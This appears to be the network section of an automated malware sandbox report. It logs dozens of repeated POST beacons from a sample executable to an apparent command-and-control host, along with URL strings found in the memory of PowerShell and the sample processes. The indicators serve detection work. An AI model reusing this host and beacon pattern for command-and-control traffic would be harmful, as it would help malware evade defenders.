                                    Source: global trafficHTTP traffic detected: POST /packetLowGeoProtectCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: asdff123fsdafasdf.ruContent-Length: 2516Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /packetLowGeoProtectCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: asdff123fsdafasdf.ruContent-Length: 1392Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /packetLowGeoProtectCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: asdff123fsdafasdf.ruContent-Length: 2512Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /packetLowGeoProtectCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: asdff123fsdafasdf.ruContent-Length: 2516Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /packetLowGeoProtectCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: asdff123fsdafasdf.ruContent-Length: 2516Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /packetLowGeoProtectCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: asdff123fsdafasdf.ruContent-Length: 2516Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /packetLowGeoProtectCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: asdff123fsdafasdf.ruContent-Length: 2516Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /packetLowGeoProtectCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: asdff123fsdafasdf.ruContent-Length: 2516Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /packetLowGeoProtectCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: asdff123fsdafasdf.ruContent-Length: 2516Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /packetLowGeoProtectCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: asdff123fsdafasdf.ruContent-Length: 1380Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /packetLowGeoProtectCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: asdff123fsdafasdf.ruContent-Length: 2516Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /packetLowGeoProtectCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: asdff123fsdafasdf.ruContent-Length: 2516Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /packetLowGeoProtectCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: asdff123fsdafasdf.ruContent-Length: 2516Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /packetLowGeoProtectCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: asdff123fsdafasdf.ruContent-Length: 2516Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /packetLowGeoProtectCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: asdff123fsdafasdf.ruContent-Length: 2516Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /packetLowGeoProtectCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: asdff123fsdafasdf.ruContent-Length: 2516Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /packetLowGeoProtectCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: asdff123fsdafasdf.ruContent-Length: 2516Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /packetLowGeoProtectCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: asdff123fsdafasdf.ruContent-Length: 2516Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /packetLowGeoProtectCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: asdff123fsdafasdf.ruContent-Length: 1380Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /packetLowGeoProtectCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: asdff123fsdafasdf.ruContent-Length: 2516Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /packetLowGeoProtectCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: asdff123fsdafasdf.ruContent-Length: 2516Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /packetLowGeoProtectCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: asdff123fsdafasdf.ruContent-Length: 2516Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /packetLowGeoProtectCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: asdff123fsdafasdf.ruContent-Length: 2516Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /packetLowGeoProtectCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: asdff123fsdafasdf.ruContent-Length: 2516Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /packetLowGeoProtectCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: asdff123fsdafasdf.ruContent-Length: 2516Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /packetLowGeoProtectCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: asdff123fsdafasdf.ruContent-Length: 2516Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /packetLowGeoProtectCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: asdff123fsdafasdf.ruContent-Length: 1380Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /packetLowGeoProtectCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: asdff123fsdafasdf.ruContent-Length: 2512Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /packetLowGeoProtectCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: asdff123fsdafasdf.ruContent-Length: 2516Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /packetLowGeoProtectCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: asdff123fsdafasdf.ruContent-Length: 2516Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /packetLowGeoProtectCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: asdff123fsdafasdf.ruContent-Length: 2516Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /packetLowGeoProtectCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: asdff123fsdafasdf.ruContent-Length: 2516Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /packetLowGeoProtectCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: asdff123fsdafasdf.ruContent-Length: 2516Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /packetLowGeoProtectCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: asdff123fsdafasdf.ruContent-Length: 2512Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /packetLowGeoProtectCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: asdff123fsdafasdf.ruContent-Length: 1364Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /packetLowGeoProtectCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: asdff123fsdafasdf.ruContent-Length: 2516Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /packetLowGeoProtectCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: asdff123fsdafasdf.ruContent-Length: 2516Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /packetLowGeoProtectCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: asdff123fsdafasdf.ruContent-Length: 2516Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /packetLowGeoProtectCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: asdff123fsdafasdf.ruContent-Length: 2512Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /packetLowGeoProtectCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: asdff123fsdafasdf.ruContent-Length: 2516Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /packetLowGeoProtectCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: asdff123fsdafasdf.ruContent-Length: 2512Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /packetLowGeoProtectCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: asdff123fsdafasdf.ruContent-Length: 2516Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /packetLowGeoProtectCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: asdff123fsdafasdf.ruContent-Length: 1392Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /packetLowGeoProtectCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: asdff123fsdafasdf.ruContent-Length: 2500Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /packetLowGeoProtectCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: asdff123fsdafasdf.ruContent-Length: 2516Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /packetLowGeoProtectCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: asdff123fsdafasdf.ruContent-Length: 2512Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /packetLowGeoProtectCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: asdff123fsdafasdf.ruContent-Length: 2512Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /packetLowGeoProtectCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: asdff123fsdafasdf.ruContent-Length: 2516Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /packetLowGeoProtectCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: asdff123fsdafasdf.ruContent-Length: 2516Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /packetLowGeoProtectCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: asdff123fsdafasdf.ruContent-Length: 1392Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /packetLowGeoProtectCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: asdff123fsdafasdf.ruContent-Length: 2516Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /packetLowGeoProtectCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: asdff123fsdafasdf.ruContent-Length: 2516Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /packetLowGeoProtectCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: asdff123fsdafasdf.ruContent-Length: 2516Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /packetLowGeoProtectCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: asdff123fsdafasdf.ruContent-Length: 2516Expect: 100-continueConnection: Keep-Alive
                                    Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
                                    Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
                                    Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
                                    Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
                                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                    Source: global trafficDNS traffic detected: DNS query: asdff123fsdafasdf.ru
                                    Source: unknownHTTP traffic detected: POST /packetLowGeoProtectCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: asdff123fsdafasdf.ruContent-Length: 344Expect: 100-continueConnection: Keep-Alive
                                    Source: 8Kh5jgTdnc69SVsXvfN.exe, 00000019.00000002.3493949668.00000000030F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://asdff123fsdafasdf.ru
                                    Source: 8Kh5jgTdnc69SVsXvfN.exe, 00000019.00000002.3493949668.0000000002E9A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://asdff123fsdafasdf.ru/
                                    Source: 8Kh5jgTdnc69SVsXvfN.exe, 00000019.00000002.3493949668.00000000034F2000.00000004.00000800.00020000.00000000.sdmp, 8Kh5jgTdnc69SVsXvfN.exe, 00000019.00000002.3493949668.000000000319A000.00000004.00000800.00020000.00000000.sdmp, 8Kh5jgTdnc69SVsXvfN.exe, 00000019.00000002.3493949668.0000000003346000.00000004.00000800.00020000.00000000.sdmp, 8Kh5jgTdnc69SVsXvfN.exe, 00000019.00000002.3493949668.00000000030F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://asdff123fsdafasdf.ru/packetLowGeoProtectCentral.php
                                    Source: 8Kh5jgTdnc69SVsXvfN.exe, 00000019.00000002.3493949668.0000000003346000.00000004.00000800.00020000.00000000.sdmp, 8Kh5jgTdnc69SVsXvfN.exe, 00000019.00000002.3493949668.00000000030F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://asdff123fsdafasdf.ruS
                                    Source: powershell.exe, 00000009.00000002.2702128870.0000019ECC297000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.mic
                                    Source: powershell.exe, 00000009.00000002.2702128870.0000019ECC297000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micft.cMicRosof
                                    Source: powershell.exe, 00000009.00000002.2702128870.0000019ECC2D2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micros
                                    Source: powershell.exe, 00000008.00000002.3164480126.000001A4A8454000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2576914126.0000019EC3E85000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.3114516245.000001C490075000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.3150761843.0000021864275000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                                    Source: powershell.exe, 00000011.00000002.2442562160.0000021854429000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                                    Source: powershell.exe, 0000000D.00000002.3353868010.000001994AE60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.mic
                                    Source: powershell.exe, 00000008.00000002.2432329134.000001A498608000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2370874697.0000019EB4038000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2433427298.00000282AE2D8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2441786339.0000019932E48000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2418611372.000001C480228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2442562160.0000021854429000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                                    Source: Blockbrowser.exe, 00000005.00000002.2307367187.0000000003117000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2432329134.000001A4983E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2370874697.0000019EB3E11000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2433427298.00000282AE0B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2441786339.0000019932C21000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2418611372.000001C480001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2442562160.0000021854201000.00000004.00000800.00020000.00000000.sdmp, 8Kh5jgTdnc69SVsXvfN.exe, 00000019.00000002.3493949668.0000000002E9A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                                    Source: powershell.exe, 00000008.00000002.2432329134.000001A498608000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2370874697.0000019EB4038000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2433427298.00000282AE2D8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2441786339.0000019932E48000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2418611372.000001C480228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2442562160.0000021854429000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                                    Source: powershell.exe, 00000008.00000002.3380978390.000001A4B0AE9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://wsoft.coms/CPS/dem0
                                    Source: powershell.exe, 00000011.00000002.2442562160.0000021854429000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                                    Source: powershell.exe, 0000000D.00000002.3353868010.000001994AE60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.co
                                    Source: powershell.exe, 00000008.00000002.2432329134.000001A4983E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2370874697.0000019EB3E11000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2433427298.00000282AE0B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2441786339.0000019932C21000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2418611372.000001C480001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2442562160.0000021854201000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                                    Source: powershell.exe, 00000011.00000002.3150761843.0000021864275000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                                    Source: powershell.exe, 00000011.00000002.3150761843.0000021864275000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                                    Source: powershell.exe, 00000011.00000002.3150761843.0000021864275000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                                    Source: powershell.exe, 00000011.00000002.2442562160.0000021854429000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                                    Source: powershell.exe, 00000009.00000002.2690185459.0000019ECC217000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://goAppVClientCmdlets.psm1
